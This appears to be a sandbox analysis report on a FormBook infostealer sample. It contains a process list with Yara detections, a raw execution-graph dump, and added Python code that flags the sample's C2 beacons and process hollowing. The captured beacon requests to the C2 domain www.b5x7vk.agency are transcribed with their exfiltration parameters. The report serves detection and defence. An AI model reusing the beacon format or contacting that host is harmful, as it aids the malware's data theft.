                                              Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                              Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
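Taken together, the two requests above carry the traits by which FormBook C2 traffic is usually recognised: a short directory path (/zznj/), a long base64-like blob under a fixed parameter name (PR_xXrA) sent once as a POST body and once in a GET query next to a short id (n0=), a Linux/Chrome 46 User-Agent emitted by a Windows process, a Referer pointing at the very URL being posted to, and Connection: close on a request that claims to be a browser. The Python below is an added example, not part of the report and not the sandbox's own detection logic: it scores those traits on the captured requests (request lines and headers copied from the report, POST body prefix decoded from the Data Raw hex) and on a constructed benign request (example.com is a placeholder). The trait list and the threshold are this example's own heuristics.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Base64-alphabet blob of at least 40 characters, as carried in PR_xXrA= above.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# "/zznj/"-style target: a single short lowercase alphanumeric directory.
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,6}/$")


@dataclass
class HttpRequest:
    method: str
    target: str              # request-target as sent, including the query string
    headers: dict
    body: str = ""
    src_os: str = "windows"  # OS of the host that produced the request


def _kv_pairs(encoded: str) -> list:
    """Split k=v&k=v without turning '+' into a space: the blob is opaque data
    and urllib's parse_qsl would corrupt its base64 alphabet."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            k, _, v = part.partition("=")
            pairs.append((unquote(k), unquote(v)))
    return pairs


def indicators(req: HttpRequest) -> list:
    """Names of every FormBook-style beacon trait the request exhibits."""
    h = {k.lower(): v for k, v in req.headers.items()}
    parts = urlsplit(req.target)
    ua = h.get("user-agent", "")
    hits = []
    if SHORT_DIR.match(parts.path):                      # also matches e.g. /blog/, hence scoring
        hits.append("short-random-directory-path")
    if req.src_os == "windows" and ("X11; Linux" in ua or "Macintosh" in ua):
        hits.append("ua-platform-mismatch")
    if h.get("referer") == f"http://{h.get('host', '')}{parts.path}":
        hits.append("self-referential-referer")
    params = _kv_pairs(parts.query)
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += _kv_pairs(req.body)
    if any(B64_BLOB.match(v) for _, v in params):
        hits.append("base64-blob-parameter")
    if "Chrome/" in ua and h.get("connection", "").lower() == "close":
        hits.append("browser-ua-but-connection-close")   # real Chrome keeps connections alive
    return hits


def classify(req: HttpRequest, threshold: int = 3) -> str:
    return "formbook-like" if len(indicators(req)) >= threshold else "unremarkable"


UA_CAPTURED = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36")

# Session 35 POST; only the captured prefix of the 10304-byte body is reproduced.
FORMBOOK_POST = HttpRequest(
    "POST", "/zznj/",
    {"Host": "www.b5x7vk.agency", "Origin": "http://www.b5x7vk.agency",
     "Referer": "http://www.b5x7vk.agency/zznj/", "User-Agent": UA_CAPTURED,
     "Content-Type": "application/x-www-form-urlencoded",
     "Cache-Control": "no-cache", "Connection": "close"},
    body="PR_xXrA=aPX6cheLmOsc0WQS4c2+7Kkw8xwzIe5j6Pb7i6nDvDORB1X6y6mDPMEO6V6wZbx4PXo52FL3"
         "r87MIw4EeYupbm28wlbsii467aSsJN4g7QCWY35X8RSIvAV4T5XaiWOnv0PAYsMy5ghbzDZa3J6tbk",
)

# Session 36 GET, request line copied from the report.
FORMBOOK_GET = HttpRequest(
    "GET",
    "/zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2"
    "ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs=",
    {"Host": "www.b5x7vk.agency", "User-Agent": UA_CAPTURED, "Connection": "close"},
)

# Constructed benign request for contrast (example.com is a placeholder).
BENIGN_GET = HttpRequest(
    "GET", "/news/index.html?id=42",
    {"Host": "example.com", "Referer": "https://example.com/",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
     "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"},
)

if __name__ == "__main__":
    for name, req in [("POST", FORMBOOK_POST), ("GET", FORMBOOK_GET), ("benign", BENIGN_GET)]:
        print(name, classify(req), indicators(req))
```

Each trait on its own is weak (short directories and self-referencing Referers are common on legitimate sites), which is why the example scores rather than matches; the platform mismatch is only available when the sensor knows the originating host, as a sandbox or an EDR-fed proxy log does.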


                                              Target ID:0
                                              Start time:06:46:03
                                              Start date:25/09/2024
                                              Path:C:\Users\user\Desktop\rP0n___87004354.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rP0n___87004354.exe"
                                              Imagebase:0x770000
                                              File size:1'638'912 bytes
                                              MD5 hash:C20955BF63AC83DCD469613D4B10504A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:06:46:04
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\rP0n___87004354.exe"
                                              Imagebase:0x1e0000
                                              File size:46'504 bytes
                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:06:46:07
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
                                              Imagebase:0xdb0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:3
                                              Start time:06:46:11
                                              Start date:25/09/2024
                                              Path:C:\Windows\SysWOW64\mstsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                              Imagebase:0x770000
                                              File size:1'264'640 bytes
                                              MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:5
                                              Start time:06:46:22
                                              Start date:25/09/2024
                                              Path:C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
                                              Imagebase:0xdb0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:8
                                              Start time:06:46:34
                                              Start date:25/09/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff6bf500000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
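Two things in the process list above can be checked mechanically. Target 1 is C:\Windows\SysWOW64\svchost.exe on disk, yet its command line names rP0n___87004354.exe, a mismatch characteristic of hollowing/RunPE-style process replacement; and Targets 1 and 3 are Windows-shipped binaries whose memory carries FormBook Yara hits, which a clean svchost.exe or mstsc.exe never shows. The Python below is an added example, not from the report: it transcribes the Target entries (Yara lists shortened to rule names) and applies those two checks. The check names are this example's own.

```python
import ntpath

# Process records transcribed from the "Target ID" entries of this report.
FORMBOOK_RULES = ["JoeSecurity_FormBook_1", "Windows_Trojan_Formbook_1112e116"]
PF86 = r"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
RECORDS = [
    {"target": 0, "path": r"C:\Users\user\Desktop\rP0n___87004354.exe",
     "cmdline": r'"C:\Users\user\Desktop\rP0n___87004354.exe"', "yara": []},
    {"target": 1, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\rP0n___87004354.exe"', "yara": FORMBOOK_RULES},
    {"target": 2, "path": PF86, "cmdline": '"%s"' % PF86, "yara": FORMBOOK_RULES},
    {"target": 3, "path": r"C:\Windows\SysWOW64\mstsc.exe",
     "cmdline": r'"C:\Windows\SysWOW64\mstsc.exe"', "yara": FORMBOOK_RULES},
    {"target": 5, "path": PF86, "cmdline": '"%s"' % PF86, "yara": FORMBOOK_RULES},
    {"target": 8, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara": []},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line: a quoted path, or everything
    up to the first space when unquoted."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def findings(rec: dict) -> list:
    out = []
    # Compare basenames case-insensitively: Target 8's command line says
    # Firefox.exe while the image is firefox.exe, which is not a mismatch.
    image = ntpath.basename(rec["path"]).casefold()
    claimed = ntpath.basename(cmdline_image(rec["cmdline"])).casefold()
    if image != claimed:
        out.append("image-cmdline-mismatch")
    # A Windows-shipped binary whose memory matches the payload family has
    # been injected into; a clean copy never matches.
    if rec["path"].casefold().startswith(SYSTEM_DIRS) and rec["yara"]:
        out.append("system-binary-with-payload-yara")
    return out


def triage(records=RECORDS) -> dict:
    """Map Target ID -> list of finding names."""
    return {r["target"]: findings(r) for r in records}


if __name__ == "__main__":
    for target, hits in triage().items():
        print(target, hits or "-")
```

On a live host the same two fields come from Win32_Process (ExecutablePath and CommandLine, for example via Get-CimInstance), and the image-versus-command-line comparison transfers unchanged; the Yara signal needs a memory scanner rather than a process listing.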


                                                Execution Graph

                                                Execution Coverage:3.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:2.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:171
                                                execution_graph: interactive node/edge dump, not reproduced. Nodes are code addresses (consistent with the 0x770000 image base), edges are call/return paths; the dump continues beyond this excerpt.
                                                Graph entry nodes: 771066, 771016, 771055, 7b44c8, 773633, 77107d, 797dd3.
                                                Windows APIs reached along the dumped paths: GetStdHandle, OleInitialize, CreateThread, CloseHandle, RegisterWindowMessageW, RaiseException, DecodePointer, EncodePointer, RtlAllocateHeap, RtlFreeHeap, GetLastError, GetModuleHandleExW, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, FreeLibrary, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleFileNameW, GetFullPathNameW, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, DestroyIcon, LoadStringW, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, TlsAlloc, GetCurrentThreadId.
                                                CRT-internal labels on the same paths: __cinit, __setmbcp, __wsetenvp, __RTC_Initialize, __wwincmdln, __lock, __calloc_crt, __getptd_noexit, __NMSG_WRITE, ___crtCorExitProcess, _doexit, __dosmaperr, __ftell_nolock, _memmove, _memset, _wcscpy, _wcscat, _wcsstr, __itow, __i64tow, _free, std::exception::exception; many nodes carry the label "Mailbox".
96725->96726 96727 79d781 @_EH4_CallFilterFunc@8 __setmbcp 96725->96727 96733 79d7f6 96726->96733 96736 79d925 96726->96736 96727->96672 96728 79d9ed 96815 79d9fd LeaveCriticalSection _doexit 96728->96815 96730 798955 __calloc_crt 58 API calls 96730->96733 96731 79d972 GetStdHandle 96731->96736 96732 79d985 GetFileType 96732->96736 96733->96730 96735 79d844 96733->96735 96733->96736 96734 79d878 GetFileType 96734->96735 96735->96734 96735->96736 96813 799fab InitializeCriticalSectionAndSpinCount 96735->96813 96736->96728 96736->96731 96736->96732 96814 799fab InitializeCriticalSectionAndSpinCount 96736->96814 96740 797e83 96739->96740 96741 7a50b4 96739->96741 96745 7a4c9b GetModuleFileNameW 96740->96745 96816 79899d 58 API calls 2 library calls 96741->96816 96743 7a50da _memmove 96744 7a50f0 FreeEnvironmentStringsW 96743->96744 96744->96740 96746 7a4ccf _wparse_cmdline 96745->96746 96748 7a4d0f _wparse_cmdline 96746->96748 96817 79899d 58 API calls 2 library calls 96746->96817 96748->96679 96750 7a4ef1 __wsetenvp 96749->96750 96754 7a4ee9 96749->96754 96751 798955 __calloc_crt 58 API calls 96750->96751 96759 7a4f1a __wsetenvp 96751->96759 96752 7a4f71 96753 792ed5 _free 58 API calls 96752->96753 96753->96754 96754->96683 96755 798955 __calloc_crt 58 API calls 96755->96759 96756 7a4f96 96758 792ed5 _free 58 API calls 96756->96758 96758->96754 96759->96752 96759->96754 96759->96755 96759->96756 96760 7a4fad 96759->96760 96818 7a4787 58 API calls 2 library calls 96759->96818 96819 798f46 IsProcessorFeaturePresent 96760->96819 96762 7a4fb9 96762->96683 96765 79327b __IsNonwritableInCurrentImage 96763->96765 96842 79a651 96765->96842 96766 793299 __initterm_e 96767 792ec0 __cinit 67 API calls 96766->96767 96768 7932b8 __cinit __IsNonwritableInCurrentImage 96766->96768 96767->96768 96768->96687 96770 7749e7 96769->96770 96771 774948 96769->96771 96770->96691 96772 774982 IsThemeActive 96771->96772 96845 7934ec 96772->96845 96776 7749ae 96857 774a5b SystemParametersInfoW 
SystemParametersInfoW 96776->96857 96778 7749ba 96858 773b4c 96778->96858 96780 7749c2 SystemParametersInfoW 96780->96770 96781->96665 96782->96669 96783->96677 96787->96692 96788->96695 96789->96701 96790->96703 96791->96707 96792->96708 96795 79895c 96793->96795 96796 798997 96795->96796 96798 79897a 96795->96798 96802 7a5376 96795->96802 96796->96712 96799 799f66 TlsSetValue 96796->96799 96798->96795 96798->96796 96810 79a2b2 Sleep 96798->96810 96799->96716 96800->96719 96801->96715 96803 7a5381 96802->96803 96808 7a539c 96802->96808 96804 7a538d 96803->96804 96803->96808 96811 798ca8 58 API calls __getptd_noexit 96804->96811 96806 7a53ac RtlAllocateHeap 96807 7a5392 96806->96807 96806->96808 96807->96795 96808->96806 96808->96807 96812 793521 DecodePointer 96808->96812 96810->96798 96811->96807 96812->96808 96813->96735 96814->96736 96815->96727 96816->96743 96817->96748 96818->96759 96820 798f51 96819->96820 96825 798dd9 96820->96825 96824 798f6c 96824->96762 96826 798df3 _memset __call_reportfault 96825->96826 96827 798e13 IsDebuggerPresent 96826->96827 96833 79a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 96827->96833 96829 798ed7 __call_reportfault 96834 79c776 96829->96834 96831 798efa 96832 79a2c0 GetCurrentProcess TerminateProcess 96831->96832 96832->96824 96833->96829 96835 79c77e 96834->96835 96836 79c780 IsProcessorFeaturePresent 96834->96836 96835->96831 96838 7a5a8a 96836->96838 96841 7a5a39 5 API calls 2 library calls 96838->96841 96840 7a5b6d 96840->96831 96841->96840 96843 79a654 EncodePointer 96842->96843 96843->96843 96844 79a66e 96843->96844 96844->96766 96846 799d8b __lock 58 API calls 96845->96846 96847 7934f7 DecodePointer EncodePointer 96846->96847 96910 799ef5 LeaveCriticalSection 96847->96910 96849 7749a7 96850 793554 96849->96850 96851 793578 96850->96851 96852 79355e 96850->96852 96851->96776 96852->96851 96911 798ca8 58 API calls __getptd_noexit 96852->96911 96854 793568 96912 798f36 9 API calls _wprintf 96854->96912 96856 
793573 96856->96776 96857->96778 96859 773b59 __ftell_nolock 96858->96859 96860 7777c7 59 API calls 96859->96860 96861 773b63 GetCurrentDirectoryW 96860->96861 96913 773778 96861->96913 96863 773b8c IsDebuggerPresent 96864 7ad3dd MessageBoxA 96863->96864 96865 773b9a 96863->96865 96867 7ad3f7 96864->96867 96865->96867 96868 773bb7 96865->96868 96897 773c73 96865->96897 96866 773c7a SetCurrentDirectoryW 96869 773c87 Mailbox 96866->96869 97112 777373 59 API calls Mailbox 96867->97112 96994 7773e5 96868->96994 96869->96780 96872 7ad407 96878 7ad41d SetCurrentDirectoryW 96872->96878 96874 773bd5 GetFullPathNameW 96875 777d2c 59 API calls 96874->96875 96876 773c10 96875->96876 97010 780a8d 96876->97010 96878->96869 96880 773c2e 96881 773c38 96880->96881 97113 7d4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 96880->97113 97026 773a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 96881->97026 96884 7ad43a 96884->96881 96887 7ad44b 96884->96887 96889 774864 61 API calls 96887->96889 96891 7ad453 96889->96891 96897->96866 96910->96849 96911->96854 96912->96856 96914 7777c7 59 API calls 96913->96914 96915 77378e 96914->96915 97114 773d43 96915->97114 96917 7737ac 96918 774864 61 API calls 96917->96918 96919 7737c0 96918->96919 96920 777f41 59 API calls 96919->96920 96921 7737cd 96920->96921 97128 774f3d 96921->97128 96924 7ad2de 97195 7d9604 96924->97195 96925 7737ee Mailbox 96928 7781a7 59 API calls 96925->96928 96931 773801 96928->96931 96929 7ad2fd 96930 792ed5 _free 58 API calls 96929->96930 96933 7ad30a 96930->96933 97152 7793ea 96931->97152 96935 774faa 84 API calls 96933->96935 96937 7ad313 96935->96937 96941 773ee2 59 API calls 96937->96941 96938 777f41 59 API calls 96939 77381a 96938->96939 97155 778620 96939->97155 96943 7ad32e 96941->96943 96942 77382c Mailbox 96944 777f41 59 API calls 96942->96944 96945 773ee2 59 API calls 96943->96945 96946 773852 96944->96946 96947 7ad34a 96945->96947 96948 778620 69 API calls 96946->96948 96949 774864 
61 API calls 96947->96949 96951 773861 Mailbox 96948->96951 96950 7ad36f 96949->96950 96952 773ee2 59 API calls 96950->96952 96954 7777c7 59 API calls 96951->96954 96953 7ad37b 96952->96953 96955 7781a7 59 API calls 96953->96955 96956 77387f 96954->96956 96957 7ad389 96955->96957 97159 773ee2 96956->97159 96959 773ee2 59 API calls 96957->96959 96961 7ad398 96959->96961 96967 7781a7 59 API calls 96961->96967 96963 773899 96963->96937 96964 7738a3 96963->96964 96965 79307d _W_store_winword 60 API calls 96964->96965 96966 7738ae 96965->96966 96966->96943 96968 7738b8 96966->96968 96969 7ad3ba 96967->96969 96970 79307d _W_store_winword 60 API calls 96968->96970 96971 773ee2 59 API calls 96969->96971 96972 7738c3 96970->96972 96973 7ad3c7 96971->96973 96972->96947 96974 7738cd 96972->96974 96973->96973 96975 79307d _W_store_winword 60 API calls 96974->96975 96976 7738d8 96975->96976 96976->96961 96977 773919 96976->96977 96979 773ee2 59 API calls 96976->96979 96977->96961 96978 773926 96977->96978 97175 77942e 96978->97175 96980 7738fc 96979->96980 96982 7781a7 59 API calls 96980->96982 96984 77390a 96982->96984 96986 773ee2 59 API calls 96984->96986 96986->96977 96989 7793ea 59 API calls 96990 773961 96989->96990 96990->96989 96991 779040 60 API calls 96990->96991 96992 773ee2 59 API calls 96990->96992 96993 7739a7 Mailbox 96990->96993 96991->96990 96992->96990 96993->96863 96995 7773f2 __ftell_nolock 96994->96995 96996 7aed7b _memset 96995->96996 96997 77740b 96995->96997 96999 7aed97 GetOpenFileNameW 96996->96999 96998 7748ae 60 API calls 96997->96998 97000 777414 96998->97000 97001 7aede6 96999->97001 97976 790911 97000->97976 97003 777d2c 59 API calls 97001->97003 97006 7aedfb 97003->97006 97006->97006 97007 777429 97994 7769ca 97007->97994 97011 780a9a __ftell_nolock 97010->97011 98319 776ee0 97011->98319 97013 780a9f 97014 773c26 97013->97014 98330 7812fe 89 API calls 97013->98330 97014->96872 97014->96880 97016 780aac 97016->97014 98331 784047 91 API calls 
Mailbox 97016->98331 97018 780ab5 97018->97014 97019 780ab9 GetFullPathNameW 97018->97019 97020 777d2c 59 API calls 97019->97020 97021 780ae5 97020->97021 97027 773ac2 LoadImageW RegisterClassExW 97026->97027 97028 7ad3cc 97026->97028 98334 773041 7 API calls 97027->98334 98335 7748fe LoadImageW EnumResourceNamesW 97028->98335 97031 773b46 97032 7ad3d5 97112->96872 97113->96884 97115 773d50 __ftell_nolock 97114->97115 97116 777d2c 59 API calls 97115->97116 97127 773eb6 Mailbox 97115->97127 97118 773d82 97116->97118 97121 773db8 Mailbox 97118->97121 97236 777b52 97118->97236 97119 777b52 59 API calls 97119->97121 97120 773e89 97122 777f41 59 API calls 97120->97122 97120->97127 97121->97119 97121->97120 97123 777f41 59 API calls 97121->97123 97126 773f84 59 API calls 97121->97126 97121->97127 97124 773eaa 97122->97124 97123->97121 97125 773f84 59 API calls 97124->97125 97125->97127 97126->97121 97127->96917 97239 774d13 97128->97239 97133 7adc3f 97135 774faa 84 API calls 97133->97135 97134 774f68 LoadLibraryExW 97249 774cc8 97134->97249 97137 7adc46 97135->97137 97139 774cc8 3 API calls 97137->97139 97141 7adc4e 97139->97141 97275 77506b 97141->97275 97142 774f8f 97142->97141 97143 774f9b 97142->97143 97144 774faa 84 API calls 97143->97144 97146 7737e6 97144->97146 97146->96924 97146->96925 97149 7adc75 97283 775027 97149->97283 97151 7adc82 97153 790f36 Mailbox 59 API calls 97152->97153 97154 77380d 97153->97154 97154->96938 97157 77862b 97155->97157 97156 778652 97156->96942 97157->97156 97710 778b13 69 API calls Mailbox 97157->97710 97160 773f05 97159->97160 97161 773eec 97159->97161 97163 777d2c 59 API calls 97160->97163 97162 7781a7 59 API calls 97161->97162 97164 77388b 97162->97164 97163->97164 97165 79307d 97164->97165 97166 793089 97165->97166 97167 7930fe 97165->97167 97174 7930ae 97166->97174 97711 798ca8 58 API calls __getptd_noexit 97166->97711 97713 793110 60 API calls 4 library calls 97167->97713 97170 79310b 97170->96963 97171 793095 97712 798f36 9 
API calls _wprintf 97171->97712 97173 7930a0 97173->96963 97174->96963 97176 779436 97175->97176 97177 790f36 Mailbox 59 API calls 97176->97177 97178 779444 97177->97178 97179 773936 97178->97179 97714 77935c 59 API calls Mailbox 97178->97714 97181 7791b0 97179->97181 97715 7792c0 97181->97715 97183 7791bf 97184 790f36 Mailbox 59 API calls 97183->97184 97185 773944 97183->97185 97184->97185 97186 779040 97185->97186 97187 7af4d5 97186->97187 97189 779057 97186->97189 97187->97189 97725 778d3b 59 API calls Mailbox 97187->97725 97190 7791a0 97189->97190 97191 779158 97189->97191 97194 77915f 97189->97194 97724 779e9c 60 API calls Mailbox 97190->97724 97193 790f36 Mailbox 59 API calls 97191->97193 97193->97194 97194->96990 97196 775045 85 API calls 97195->97196 97197 7d9673 97196->97197 97726 7d97dd 97197->97726 97200 77506b 74 API calls 97201 7d96a0 97200->97201 97202 77506b 74 API calls 97201->97202 97203 7d96b0 97202->97203 97204 77506b 74 API calls 97203->97204 97205 7d96cb 97204->97205 97206 77506b 74 API calls 97205->97206 97207 7d96e6 97206->97207 97208 775045 85 API calls 97207->97208 97209 7d96fd 97208->97209 97210 79588c __crtGetStringTypeA_stat 58 API calls 97209->97210 97211 7d9704 97210->97211 97212 79588c __crtGetStringTypeA_stat 58 API calls 97211->97212 97213 7d970e 97212->97213 97214 77506b 74 API calls 97213->97214 97215 7d9722 97214->97215 97216 7d91b2 GetSystemTimeAsFileTime 97215->97216 97217 7d9735 97216->97217 97218 7d975f 97217->97218 97219 7d974a 97217->97219 97221 7d9765 97218->97221 97222 7d97c4 97218->97222 97220 792ed5 _free 58 API calls 97219->97220 97224 7d9750 97220->97224 97732 7d8baf 97221->97732 97223 792ed5 _free 58 API calls 97222->97223 97228 7ad2f1 97223->97228 97226 792ed5 _free 58 API calls 97224->97226 97226->97228 97228->96929 97230 774faa 97228->97230 97229 792ed5 _free 58 API calls 97229->97228 97231 774fb4 97230->97231 97232 774fbb 97230->97232 97233 795516 __fcloseall 83 API calls 97231->97233 97234 774fdb FreeLibrary 
